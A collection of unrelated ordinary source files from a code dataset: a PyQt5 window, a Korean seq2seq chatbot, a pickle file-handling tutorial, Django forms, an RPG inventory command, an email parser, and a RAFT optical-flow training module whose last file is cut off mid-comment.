+{"seq_id":"525807433","text":"\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom user import Ui_USER\nfrom admin import Ui_Dialog1\nclass Ui_main(object):\n def openwindow(self,event):\n self.window= QtWidgets.QDialog()\n self.ui=Ui_USER()\n self.ui.setupUi(self.window)\n self.window.show()\n main.hide()\n def openwindowadmin(self,event):\n self.window = QtWidgets.QDialog()\n self.ui=Ui_Dialog1()\n self.ui.setupUi(self.window)\n self.window.show()\n main.hide()\n def setupUi(self, main):\n main.setObjectName(\"main\")\n main.setWindowModality(QtCore.Qt.NonModal)\n main.setEnabled(True)\n main.resize(1188, 631)\n main.setMinimumSize(QtCore.QSize(1188, 631))\n main.setMaximumSize(QtCore.QSize(1188, 631))\n font = QtGui.QFont()\n font.setBold(True)\n font.setItalic(True)\n font.setWeight(75)\n main.setFont(font)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\"E:/project/icon.jpg\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n main.setWindowIcon(icon)\n main.setWindowOpacity(1.0)\n main.setStyleSheet(\"background-image: url(:/newPrefix/imageedit_8_7961532127.jpg);\")\n main.setSizeGripEnabled(False)\n main.setModal(False)\n self.label = QtWidgets.QLabel(main)\n self.label.setGeometry(QtCore.QRect(170, 490, 171, 41))\n self.label.setStyleSheet(\"background: transparent;\\n\"\n\"font: 75 12pt \\\"Times New Roman\\\";\\n\"\n\"color:rgb(85, 0, 127);\")\n self.label.setObjectName(\"label\")\n self.label.mousePressEvent=self.openwindowadmin\n self.label_2 = QtWidgets.QLabel(main)\n self.label_2.setGeometry(QtCore.QRect(360, 410, 131, 31))\n self.label_2.setStyleSheet(\"background:transparent;\\n\"\n\"font: 14pt \\\"Times New Roman\\\";\\n\"\n\"color:rgb(0, 0, 127)\")\n self.label_2.setObjectName(\"label_2\")\n self.label_2.mousePressEvent = self.openwindow\n\n self.retranslateUi(main)\n QtCore.QMetaObject.connectSlotsByName(main)\n\n def retranslateUi(self, main):\n _translate = QtCore.QCoreApplication.translate\n main.setWindowTitle(_translate(\"main\", \"QWIKLY\"))\n self.label.setText(_translate(\"main\", \"ADMINISTRATOR\"))\n self.label_2.setText(_translate(\"main\", \" USER\"))\nimport xx_rc\n\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n main = QtWidgets.QDialog()\n ui = Ui_main()\n ui.setupUi(main)\n main.show()\n sys.exit(app.exec_())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"601207099","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[13]:\n\n\nfrom tensorflow.keras import models\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import optimizers, losses, metrics\nfrom tensorflow.keras import preprocessing\n\nimport numpy as np\nimport pandas as pd\n\nimport os\nimport re\nimport pickle\n\nfrom konlpy.tag import Okt\n\nclass seq2seq:\n def __init__(self):\n # 태그 단어\n self.PAD = \"\" # 패딩\n self.STA = \"\" # 시작\n self.END = \"\" # 끝\n self.OOV = \"\" # 없는 단어(Out of Vocabulary)\n\n # 태그 인덱스\n self.PAD_INDEX = 0\n self.STA_INDEX = 1\n self.END_INDEX = 2\n self.OOV_INDEX = 3\n\n # 데이터 타입\n self.ENCODER_INPUT = 0\n self.DECODER_INPUT = 1\n self.DECODER_TARGET = 2\n\n # 한 문장에서 단어 시퀀스의 최대 개수\n self.max_sequences = 30\n\n # 임베딩 벡터 차원\n self.embedding_dim = 100\n\n # LSTM 히든레이어 차원\n self.lstm_hidden_dim = 128\n\n # 정규 표현식 필터\n self.RE_FILTER = re.compile(\"[.,!?\\\"':;~()]\")\n\n #학습시 생성한 word_index vocab호출\n with open('./seq2seq/vocab_dict/index_to_word_final.pickle', 'rb') as f:\n self.index_to_word = pickle.load(f)\n\n with open('./seq2seq/vocab_dict/word_to_index_final.pickle', 'rb') as f:\n self.word_to_index = pickle.load(f)\n \n #--------------------------------------------\n # 훈련 모델 인코더 정의\n #--------------------------------------------\n # 입력 문장의 인덱스 시퀀스를 입력���로 받음\n encoder_inputs = layers.Input(shape=(None,))\n # 임베딩 레이어\n encoder_outputs = layers.Embedding(len(self.index_to_word), self.embedding_dim)(encoder_inputs)\n # return_state가 True면 상태값 리턴\n # LSTM은 state_h(hidden state)와 state_c(cell state) 2개의 상태 존재\n encoder_outputs, state_h, state_c = layers.LSTM(self.lstm_hidden_dim,\n dropout=0.1,\n recurrent_dropout=0.5,\n return_state=True)(encoder_outputs)\n # 히든 상태와 셀 상태를 하나로 묶음\n encoder_states = [state_h, state_c]\n #--------------------------------------------\n # 훈련 모델 디코더 정의\n #--------------------------------------------\n # 목표 문장의 인덱스 시퀀스를 입력으로 받음\n decoder_inputs = layers.Input(shape=(None,))\n # 임베딩 레이어\n decoder_embedding = layers.Embedding(len(self.index_to_word), self.embedding_dim)\n decoder_outputs = decoder_embedding(decoder_inputs)\n # 인코더와 달리 return_sequences를 True로 설정하여 모든 타임 스텝 출력값 리턴\n # 모든 타임 스텝의 출력값들을 다음 레이어의 Dense()로 처리하기 위함\n decoder_lstm = layers.LSTM(self.lstm_hidden_dim,\n dropout=0.1,\n recurrent_dropout=0.5,\n return_state=True,\n return_sequences=True)\n\n # initial_state를 인코더의 상태로 초기화\n decoder_outputs, _, _ = decoder_lstm(decoder_outputs,\n initial_state=encoder_states)\n\n # 단어의 개수만큼 노드의 개수를 설정하여 원핫 형식으로 각 단어 인덱스를 출력\n decoder_dense = layers.Dense(len(self.index_to_word), activation='softmax')\n decoder_outputs = decoder_dense(decoder_outputs)\n\n\n\n #--------------------------------------------\n # 훈련 모델 정의\n #--------------------------------------------\n\n # 입력과 출력으로 함수형 API 모델 생성\n model = models.Model([encoder_inputs, decoder_inputs], decoder_outputs)\n\n # 학습 방법 설정\n model.compile(optimizer='rmsprop',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n #--------------------------------------------\n # 예측 모델 인코더 정의\n #--------------------------------------------\n\n # 훈련 모델의 인코더 상태를 사용하여 예측 모델 인코더 설정\n encoder_model = models.Model(encoder_inputs, encoder_states)\n\n\n\n #--------------------------------------------\n # 예측 모델 디코더 정의\n #--------------------------------------------\n\n # 예측시에는 훈련시와 달리 타임 스텝을 한 단계씩 수행\n # 매번 이전 디코더 상태를 입력으로 받아서 새로 설정\n decoder_state_input_h = layers.Input(shape=(self.lstm_hidden_dim,))\n decoder_state_input_c = 
layers.Input(shape=(self.lstm_hidden_dim,))\n decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c] \n\n # 임베딩 레이어\n decoder_outputs = decoder_embedding(decoder_inputs)\n\n # LSTM 레이어\n decoder_outputs, state_h, state_c = decoder_lstm(decoder_outputs,\n initial_state=decoder_states_inputs)\n\n # 히든 상태와 셀 상태를 하나로 묶음\n decoder_states = [state_h, state_c]\n\n # Dense 레이어를 통해 원핫 형식으로 각 단어 인덱스를 출력\n decoder_outputs = decoder_dense(decoder_outputs)\n\n # 예측 모델 디코더 설정\n decoder_model = models.Model([decoder_inputs] + decoder_states_inputs,\n [decoder_outputs] + decoder_states)\n \n self.model = model\n self.encoder_model = encoder_model\n self.decoder_model = decoder_model\n\n #가중치 불러오기\n self.model.load_weights('./seq2seq/seq2seq_model/seq2seq2_model_weights')\n self.encoder_model.load_weights('./seq2seq/seq2seq_model/seq2seq2_encoder_model_weights')\n self.decoder_model.load_weights('./seq2seq/seq2seq_model/seq2seq2_decoder_model_weights')\n print(self.model.summary())\n \n # 형태소분석 함수\n def pos_tag(self, sentences):\n \n # KoNLPy 형태소분석기 설정\n tagger = Okt()\n \n # 문장 품사 변수 초기화\n sentences_pos = []\n \n # 모든 문장 반복\n for sentence in sentences:\n # 특수기호 제거\n sentence = re.sub(self.RE_FILTER, \"\", sentence)\n #print(sentence)\n # 배열인 형태소분석의 출력을 띄어쓰기로 구분하여 붙임\n sentence = \" \".join(tagger.morphs(sentence))\n sentences_pos.append(sentence)\n \n return sentences_pos\n\n def make_predict_input(self, sentence):\n\n sentences = []\n sentences.append(sentence)\n sentences = self.pos_tag(sentences)\n input_seq = self.convert_text_to_index(sentences, self.word_to_index, self.ENCODER_INPUT)\n \n return input_seq\n\n # 인덱스를 문장으로 변환\n def convert_index_to_text(self, indexs, vocabulary): \n \n sentence = ''\n \n # 모든 문장에 대해서 반복\n for index in indexs:\n if index == self.END_INDEX:\n # 종료 인덱스면 중지\n break;\n if vocabulary.get(index) is not None:\n # 사전에 있는 인덱스면 해당 단어를 추가\n sentence += vocabulary[index]\n else:\n # 사전에 없는 인덱스면 OOV 단어를 추가\n sentence.extend([vocabulary[self.OOV_INDEX]])\n \n # 빈칸 추가\n sentence += ' '\n\n return sentence\n\n \n # 문장을 인덱스로 변환\n def convert_text_to_index(self, sentences, vocabulary, type): \n \n sentences_index = []\n \n # 모든 문장에 대해서 반복\n for sentence in sentences:\n sentence_index = []\n \n # 디코더 입력일 경우 맨 앞에 START 태그 추가\n if type == self.DECODER_INPUT:\n sentence_index.extend([vocabulary[self.STA]])\n \n # 문장의 단어들을 띄어쓰기로 분리\n for word in sentence.split():\n if vocabulary.get(word) is not None:\n # 사전에 있는 단어면 해당 인덱스를 추가\n sentence_index.extend([vocabulary[word]])\n else:\n # 사전에 없는 단어면 OOV 인덱스를 추가\n sentence_index.extend([vocabulary[self.OOV]])\n\n # 최대 길이 검사\n if type == self.DECODER_TARGET:\n # 디코더 목표일 경우 맨 뒤에 END 태그 추가\n if len(sentence_index) >= self.max_sequences:\n sentence_index = sentence_index[:self.max_sequences-1] + [vocabulary[self.END]]\n else:\n sentence_index += [vocabulary[self.END]]\n else:\n if len(sentence_index) > self.max_sequences:\n sentence_index = sentence_index[:self.max_sequences]\n \n # 최대 길이에 없는 공간은 패딩 인덱스로 채움\n sentence_index += (self.max_sequences - len(sentence_index)) * [vocabulary[self.PAD]]\n \n # 문장의 인덱스 배열을 추가\n sentences_index.append(sentence_index)\n\n return np.asarray(sentences_index)\n\n\n # 텍스트 생성\n def generate_text(self, input_seq):\n \n # 입력을 인코더에 넣어 마지막 상태 구함\n states = self.encoder_model.predict(input_seq)\n\n # 목표 시퀀스 초기화\n target_seq = np.zeros((1, 1))\n \n # 목표 시퀀스의 첫 번째에 태그 추가\n target_seq[0, 0] = self.STA_INDEX\n \n # 인덱스 초기화\n indexs = []\n \n # 디코더 타임 스텝 반복\n while 1:\n # 디코더로 현재 타임 스텝 출력 구함\n # 처음에는 인코더 상태를, 다음부터 
이전 디코더 상태로 초기화\n decoder_outputs, state_h, state_c = self.decoder_model.predict(\n [target_seq] + states)\n\n # 결과의 원핫인코딩 형식을 인덱스로 변환\n index = np.argmax(decoder_outputs[0, 0, :])\n indexs.append(index)\n \n # 종료 검사\n if index == self.END_INDEX or len(indexs) >= self.max_sequences:\n break\n\n # 목표 시퀀스를 바로 이전의 출력으로 설정\n target_seq = np.zeros((1, 1))\n target_seq[0, 0] = index\n \n # 디코더의 이전 상태를 다음 디코더 예측에 사용\n states = [state_h, state_c]\n\n # 인덱스를 문장으로 변환\n sentence = self.convert_index_to_text(indexs, self.index_to_word)\n to_matching = sentence.split(' ')\n to_matching = to_matching[:-1]\n chatbot_data = pd.read_csv('./seq2seq/ChatbotData_Cindy.csv', encoding='utf-8')\n try:\n for_matching = list(chatbot_data[chatbot_data.A.apply(lambda sentence1: all(word in sentence1 for word in to_matching))]['A'])\n return_sentence = for_matching[0]\n except IndexError:\n return_sentence = sentence\n return return_sentence\n \n\n def get_answer(self, text):\n input_seq = self.make_predict_input(text)\n return self.generate_text(input_seq)\n\n \n\n\n\n\n","sub_path":"Cindy_project/seq2seq/Seq2Seq_model_class.py","file_name":"Seq2Seq_model_class.py","file_ext":"py","file_size_in_byte":11262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"403456200","text":"#!/usr/bin/env python\n\"\"\"\n文件读、写,的步骤:\n 1.打开文件\n 2.读/写\n 3.关闭文件\nUTF-8编码:\n建议,文件在磁盘上保存时统一使用UTF-8编码\n在内存中,统一使用Unicode编码\n\"\"\"\nimport pickle\n\ndef 从文件中读数据():\n fp = open(\"names.txt\", \"rb\")\n #print(fp.read())\n content = fp.readlines()\n fp.seek(0)\n content2 = fp.readlines()\n print(content)\n print(content2)\n for i in content:\n print(i.decode(\"utf-8\").strip())\n fp.close()\n\n\ndef 把数据写入到文件():\n fp = open(\"地址.txt\", \"wb\")\n address = [\"中国\", \"非洲\", \"朝鲜\"]\n for i in address:\n #fp.write(i.encode(\"utf-8\")+ b'\\n')\n fp.write(\"{}\\n\".format(i).encode(\"utf-8\"))\n fp.close()\n\n\ndef write_pickle():\n dict1 = {\"name\": \"sam\", \"age\": 16}\n # fp = open(\"tmp_pickle\", 'wb')\n # pickle.dump(dict1, fp)\n # fp.close()\n\n # 优势:with上下文管理器,自动关闭已经打开的问题\n with open(\"tmp_pickle\", 'wb') as fp:\n pickle.dump(dict1, fp)\n\n\ndef read_pickle():\n fp = open(\"tmp_pickle\", 'rb')\n dict1 = pickle.load(fp)\n print(dict1)\n fp.close()\n\n\nif __name__ == \"__main__\":\n 从文件中读数据()\n #把数据写入到文件()\n #write_pickle()\n #read_pickle()","sub_path":"read_write_file.py","file_name":"read_write_file.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"302956747","text":"from django import forms\nfrom django.forms.widgets import CheckboxInput\nfrom .models import Project, Task\n\n\nclass NewTaskForm(forms.ModelForm):\n # task_done = forms.BooleanField(required=False, widget= CheckboxInput)\n\n\n class Meta:\n model = Task\n fields = [\"task_title\", \"task_content\"]\n \n\n\n\nclass NewProjectForm(forms.ModelForm):\n # task_done = forms.BooleanField(required=False, widget= CheckboxInput)\n\n\n class Meta:\n model = Project\n fields = [\"project_title\"]\n class Media:\n js = ('ckeditor/ckeditor.js',) # The , at the end of this list IS important.\n css = {\n 'all': ('ckeditor/contents.css',)\n }\n","sub_path":"todo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"96065825","text":"from handler import BaseCommand, Context, Arguments, CommandResult\n\nfrom rpg.player import Player, UnknownPlayer\nfrom utils.formatting import codeblock\n\n\nclass Command(BaseCommand):\n async def run(self, ctx: Context, args: Arguments) -> CommandResult:\n try:\n player = await Player.from_id(ctx.author.id, ctx.bot.pg)\n except UnknownPlayer:\n return \"У вас нет персонажа\"\n\n if player.inventory.size:\n inventory = \"\\n\".join(str(i) for i in player.inventory)\n else:\n inventory = \"Ваш инвентарь пуст\"\n\n equipment_item_map = [\n (slot, getattr(player.equipment, slot))\n for slot in player.equipment._slots\n ]\n\n equipment = \"\\n\".join(\n f\"{slot:>10}: {item}\" for (slot, item) in equipment_item_map\n )\n\n return codeblock(\n f\"Экипировка:\\n\\n{equipment}\\n\\nИнвентарь:\\n\\n{inventory}\"\n )\n","sub_path":"tarakania_rpg/commands/rpg/inventory/command_inventory.py","file_name":"command_inventory.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"626775693","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\nfrom translate import Translate\n\nclass Email:\n def __init__(self, name, booking_no, errand, msg):\n self.sender = name\n self.booking_no = booking_no\n self.errand = errand\n self.msg = msg\n\nclass EmailParser:\n def __init__(self, max_length=0):\n self.MAX_MESSAGE_LENGTH = max_length\n\n def set_message_max_length(self, max_length):\n self.MAX_MESSAGE_LENGTH = max_length\n\n def parse_inbox(self, inbox, qty):\n emails = []\n count = 0\n invalid = 0\n while count < qty:\n try:\n count += 1\n item = next(inbox).body\n email = self.__parse_email(item)\n if email:\n emails.append(email)\n except Exception as e:\n invalid += 1\n print('EMAIL UNREADABLE', e)\n print('{} / {} emails parsed.'.format(qty - invalid, qty))\n return emails\n\n def __clean_html(self, html_object):\n if html_object is not None:\n return re.sub('<[^<]+?>', '', html_object)\n\n def __get_element(self, table, row):\n return str(table.findAll('table')[row].findAll('tr')[0])\n\n def __has_booking_no(self, table):\n return 'Ev bokningsnummer' in self.__get_element(table, 2)\n\n def __parse_email(self, html):\n soup = BeautifulSoup(html, 'html.parser')\n table = soup.findAll('table')[0]\n name = self.__get_element(table, 1)\n booking_no = self.__get_element(table, 3) if self.__has_booking_no(table) else '~None~'\n errand = self.__get_element(table, 5) if self.__has_booking_no(table) else self.__get_element(table, 3)\n msg = self.__get_element(table, 7) if self.__has_booking_no(table) else self.__get_element(table, 5)\n\n if len(str(msg)) <= self.MAX_MESSAGE_LENGTH or self.MAX_MESSAGE_LENGTH == 0:\n return Email(\n self.__clean_html(name)[1:][:-1],\n self.__clean_html(booking_no)[1:][:-1],\n self.__clean_html(errand)[1:][:-1],\n self.__clean_html(msg)[1:][:-1]\n )\n","sub_path":"src/email_parser.py","file_name":"email_parser.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"586602652","text":"# STD\nimport os\nimport shutil\nfrom pathlib import Path\n\n# MISC\nimport numpy as np\nimport shutil\n\n# DL-framework\nimport torch\nimport torch.optim.lr_scheduler\nfrom pytorch_lightning.core.lightning import LightningModule\nfrom torchvision import transforms\nfrom torchvision.utils import make_grid\nfrom torch import from_numpy as fn\n\n# MODULES\n\nfrom src.common.utils import DotDict\nfrom raft import RAFT\nfrom src.common.visu import Visualizer\nfrom pose_estimation import full_pose_estimation\n\nfrom src.segmentation.fast_scnn import FastSCNN\nfrom src.common.rotations import so3_relative_angle\n\n\n__all__ = [\"Network\"]\n\n# exclude extremly large displacements\nMAX_FLOW = 400\nSUM_FREQ = 100\nVAL_FREQ = 5000\n# exclude extremly large displacements\nMAX_FLOW = 400\nSUM_FREQ = 100\nVAL_FREQ = 5000\n\n\ndef sequence_loss(flow_preds, flow_gt, valid, synthetic, gamma=0.8, max_flow=MAX_FLOW):\n \"\"\"Loss function defined over sequence of flow predictions\"\"\"\n\n n_predictions = len(flow_preds)\n flow_loss = 0.0\n\n # exlude invalid pixels and extremely large diplacements\n mag = torch.sum(flow_gt ** 2, dim=1).sqrt()\n valid = (valid >= 0.5) & (mag < max_flow)\n\n for i in range(n_predictions):\n i_weight = gamma ** (n_predictions - i - 1)\n i_loss = (flow_preds[i] - flow_gt).abs()\n flow_loss += i_weight * (valid[:, None] * i_loss).mean()\n\n epe = torch.sum((flow_preds[-1] - flow_gt) ** 2, dim=1).sqrt()\n epe2 = epe.clone()\n epe2 = epe2 * valid\n epe2 = epe2.sum(dim=(1, 2)) / valid.sum(dim=(1, 2))\n metrics = {}\n\n if synthetic.sum() > 0:\n metrics[\"epe_render\"] = epe2[synthetic].mean().item()\n non_synthetic = synthetic == False\n if non_synthetic.sum() > 0:\n metrics[\"epe_real\"] = epe2[non_synthetic].mean().item()\n\n epe = epe.view(-1)[valid.view(-1)]\n metrics[\"epe\"] = epe.mean().item()\n metrics[\"1px\"] = (epe < 1).float().mean().item()\n metrics[\"3px\"] = (epe < 3).float().mean().item()\n metrics[\"5px\"] = (epe < 5).float().mean().item()\n\n return flow_loss, metrics, epe2\n\n\nclass Network(LightningModule):\n def __init__(self, exp, env):\n super().__init__()\n self._exp = exp\n self._env = env\n self.hparams[\"lr\"] = self._exp[\"lr\"]\n\n self.model = RAFT(args=DotDict(self._exp[\"model\"][\"args\"]))\n\n self._mode = \"train\"\n self._logged_images = {\"train\": 0, \"val\": 0, \"test\": 0}\n\n if \"logged_images_max\" in self._exp.keys():\n self._logged_images_max = self._exp[\"logged_images_max\"]\n else:\n self._logged_images_max = {\"train\": 2, \"val\": 2, \"test\": 2}\n\n self._type = (\n torch.float16 if exp[\"trainer\"].get(\"precision\", 32) == 16 else torch.float32\n )\n self._visu = Visualizer(\n os.path.join(exp[\"name\"], \"visu\"), num_classes=2, store=False\n )\n\n if self._exp.get(\"mode\", \"train\") == \"test\":\n self._estimate_pose = True\n # SEGMENTATION\n self.seg = FastSCNN(**self._exp[\"seg\"][\"cfg\"])\n self.output_transform_seg = transforms.Compose(\n [\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n ]\n )\n else:\n self._estimate_pose = False\n\n self._count_real = {\"train\": 0, \"val\": 0, \"test\": 0}\n self._count_render = {\"train\": 0, \"val\": 0, \"test\": 0}\n\n shutil.rmtree(\"/home/jonfrey/tmp/ycb\", ignore_errors=True)\n\n def forward(self, batch, **kwargs):\n image1 = batch[0]\n image2 = batch[1]\n flow_predictions = self.model(image1, image2, iters=self._exp[\"model\"][\"iters\"])\n\n self.plot(batch[2], flow_predictions, image1, image2, batch[3])\n return 
flow_predictions\n\n    def on_train_epoch_start(self):\n\n        self._visu.logger = self.logger\n        self._mode = \"train\"\n\n    def on_train_start(self):\n        pass\n\n    def on_epoch_start(self):\n        # RESET IMAGE COUNT\n        for k in self._logged_images.keys():\n            self._logged_images[k] = 0\n        self._visu.epoch = self.trainer.current_epoch\n        self.log(\"current_epoch\", self.trainer.current_epoch)\n        self.log(\"global_step\", self.trainer.global_step)\n\n    def training_step(self, batch, batch_idx):\n        \"\"\"\n        img1 0-255 BS,C,H,W\n        img2 0-255 BS,C,H,W\n        flow BS,2,H,W max [-155 263]\n        valid 0 or 1\n\n        flow_predictions is a list len(flow_predictions) = iters , flow_predictions[0].shape == flow.shape\n        \"\"\"\n        self.log(\n            \"learning_rate\", float(self.trainer.lr_schedulers[0][\"scheduler\"].get_lr()[0])\n        )\n        BS = batch[0].shape[0]\n        flow = batch[2]\n        valid = batch[3]\n        synthetic = batch[4]\n        flow_predictions = self(batch=batch)\n\n        loss, metrics, epe_per_object = sequence_loss(\n            flow_predictions, flow, valid, synthetic, self._exp[\"model\"][\"gamma\"]\n        )\n\n        if self._estimate_pose:\n            # PRED FLOW\n            inp = torch.cat(\n                [\n                    self.output_transform_seg(batch[0] / 255.0),\n                    self.output_transform_seg(batch[1] / 255.0),\n                ],\n                dim=1,\n            )\n            outputs = self.seg(inp)\n            probs = torch.nn.functional.softmax(outputs[0], dim=1)\n            pred_valid = torch.argmax(probs, dim=1)\n            acc = (pred_valid == valid).sum() / torch.numel(valid)\n            (\n                h_gt,\n                h_render,\n                h_init,\n                bb,\n                idx,\n                K_ren,\n                K_real,\n                render_d,\n                model_points,\n                img_real_ori,\n                p,\n            ) = batch[5:]\n\n            # ESTIMATE POSE\n            (\n                res_dict,\n                count_invalid,\n                h_pred__pred_pred,\n                ratios,\n                valid_res,\n            ) = full_pose_estimation(\n                h_gt=h_gt.clone(),\n                h_render=h_render.clone(),\n                h_init=h_init.clone(),\n                bb=bb,\n                flow_valid=pred_valid.clone(),\n                flow_pred=flow_predictions[-1].clone(),\n                idx=idx.clone(),\n                K_ren=K_ren,\n                K_real=K_real,\n                render_d=render_d.clone(),\n                model_points=model_points.clone(),\n                cfg=self._exp[\"eval_cfg\"].get(\"full_pose_estimation\", {}),\n            )\n            try:\n                self.count_suc += BS - count_invalid\n                self.count_failed += count_invalid\n            except AttributeError:\n                # counters are created lazily on the first training step\n                self.count_suc = BS - count_invalid\n                self.count_failed = count_invalid\n\n            self.log(f\"acc_mask\", acc.item(), on_step=True, on_epoch=True)\n\n            index_key = str(int(idx))\n            self.log(\n                f\"initial_trans_error_obj\" + index_key,\n                (torch.norm(h_gt[0, :3, 3] - h_init[0, :3, 3])).item(),\n                on_step=True,\n                on_epoch=True,\n            )\n            self.log(\n                f\"initial_rotation_error_obj\" + index_key,\n                (\n                    so3_relative_angle(\n                        h_gt[:, :3, :3].type(torch.float32), h_init[:, :3, :3].type(torch.float32)\n                    )\n                    / np.math.pi\n                    * 180\n                ).item(),\n                on_step=True,\n                on_epoch=True,\n            )\n\n            self.log(\n                f\"initial_trans_error\",\n                torch.norm(h_gt[0, :3, 3] - h_init[0, :3, 3]).item(),\n                on_step=True,\n                on_epoch=True,\n            )\n            self.log(\n                f\"initial_rotation_error\",\n                (\n                    so3_relative_angle(\n                        h_gt[:, :3, :3].type(torch.float32), h_init[:, :3, :3].type(torch.float32)\n                    )\n                    / np.math.pi\n                    * 180\n                ).item(),\n                on_step=True,\n                on_epoch=True,\n            )\n\n            if len(res_dict) > 0:\n                self.log(f\"ransac_inlier_ratio\", float(ratios[0]), on_step=False, on_epoch=True)\n                # STORE PREDICTIONS\n                tmp = os.path.join(\n                    self._exp[\"name\"], p[0][p[0].find(\"ycb\") :], str(int(idx[0]) + 1) + \".npy\"\n                )\n                tmp2 = os.path.join(\n                    \"/home/jonfrey/tmp\", p[0][p[0].find(\"ycb\") :], str(int(idx[0]) + 1) + \".npy\"\n                )\n                Path(tmp).parent.mkdir(parents=True, exist_ok=True)\n                np.save(str(tmp), h_pred__pred_pred[0].cpu().numpy())\n                Path(tmp2).parent.mkdir(parents=True, exist_ok=True)\n                np.save(str(tmp2), 
h_pred__pred_pred[0].cpu().numpy())\n\n index_key = str(int(idx))\n self.log(f\"acc_mask_obj\" + index_key, acc.item(), on_step=True, on_epoch=True)\n\n self.log(\n f\"adds_init_obj\" + index_key,\n res_dict[\"adds_h_init\"].cpu().item(),\n on_step=True,\n on_epoch=True,\n )\n self.log(\n f\"add_s_init_obj\" + index_key,\n res_dict[\"add_s_h_init\"].cpu().item(),\n on_step=True,\n on_epoch=True,\n )\n\n self.log(\n f\"adds_obj\" + index_key,\n res_dict[\"adds_h_pred\"].cpu().item(),\n on_step=True,\n on_epoch=True,\n )\n self.log(\n f\"add_s_obj\" + index_key,\n res_dict[\"add_s_h_pred\"].cpu().item(),\n on_step=True,\n on_epoch=True,\n )\n self.plot_pose(\n model_points=model_points,\n h_gt=h_gt,\n h_init=h_init,\n h_pred=h_pred__pred_pred,\n pred_valid=pred_valid,\n img_real_zoom=batch[0],\n img_real_ori=img_real_ori,\n K_real=K_real,\n index=batch_idx,\n )\n else:\n print(\"Count SUC\", self.count_suc, \" Count FAILED\", self.count_failed)\n # print(\"Force PLOT since Pose Estimation vailed!\")\n # self.plot( batch[2], flow_predictions, batch[0], batch[1], pred_valid, force =True, index = batch_idx)\n # self.plot_seg ( batch[0], batch[1], pred_valid, valid,force = True, index = batch_idx )\n\n if batch_idx % 50 == 0:\n self.log(f\"count_suc\", self.count_suc, on_step=True, on_epoch=False)\n self.log(f\"count_failed\", self.count_failed, on_step=True, on_epoch=False)\n\n for k in res_dict.keys():\n # print( \"k \", k, \" res_dict \", res_dict[k] ,\" value \", res_dict[k].mean())\n self.log(\n f\"{self._mode}_{k}_pred_flow_pred_seg\",\n res_dict[k].mean().item(),\n on_step=True,\n on_epoch=False,\n prog_bar=False,\n )\n\n if False:\n # GT FLOW GT SEG\n res_dict, count_invalid, h_pred__gt_gt = full_pose_estimation(\n h_gt=h_gt.clone(),\n h_render=h_render.clone(),\n h_init=h_init.clone(),\n bb=bb,\n flow_valid=valid.clone(),\n flow_pred=flow.clone(),\n idx=idx.clone(),\n K_ren=K_ren,\n K_real=K_real,\n render_d=render_d.clone(),\n model_points=model_points.clone(),\n cfg=self._exp[\"eval_cfg\"].get(\"full_pose_estimation\", {}),\n )\n for k in res_dict.keys():\n self.log(\n f\"{self._mode}_{k}_gt_flow_gt_seg\",\n res_dict[k].mean(),\n on_step=True,\n on_epoch=True,\n prog_bar=True,\n )\n\n # PRED FLOW GT SEG\n (\n h_gt,\n h_render,\n h_init,\n bb,\n idx,\n K_ren,\n K_real,\n render_d,\n model_points,\n img_real_ori,\n p,\n ) = batch[5:]\n res_dict, count_invalid, h_pred__pred_gt = full_pose_estimation(\n h_gt=h_gt.clone(),\n h_render=h_render.clone(),\n h_init=h_init.clone(),\n bb=bb,\n flow_valid=valid.clone(),\n flow_pred=flow_predictions[-1].clone(),\n idx=idx.clone(),\n K_ren=K_ren,\n K_real=K_real,\n render_d=render_d.clone(),\n model_points=model_points.clone(),\n cfg=self._exp[\"eval_cfg\"].get(\"full_pose_estimation\", {}),\n )\n for k in res_dict.keys():\n self.log(\n f\"{self._mode}_{k}_pred_flow_gt_seg\",\n res_dict[k].mean(),\n on_step=True,\n on_epoch=True,\n prog_bar=False,\n )\n\n else:\n idx = batch[5]\n bb = batch[6] # list containing tensors for [real_tl ,real_br, ren_tl, ren_br ]\n\n logging_metrices = [\"epe\", \"epe_real\", \"epe_render\"]\n for met in logging_metrices:\n if met in metrics:\n self.log(\n f\"{self._mode}_{met}\",\n metrics[met],\n on_step=True,\n on_epoch=True,\n prog_bar=True,\n )\n\n if self._exp.get(\"log\", {}).get(\"individual_obj\", {}).get(self._mode, False):\n for i in range(BS):\n obj = str(int(idx[i]))\n # real_tl ,real_br, ren_tl, ren_br\n tl = bb[0][i]\n br = bb[1][i]\n\n _w = br[1] - tl[1]\n _h = br[0] - tl[0]\n\n # r1 and r2 should be 
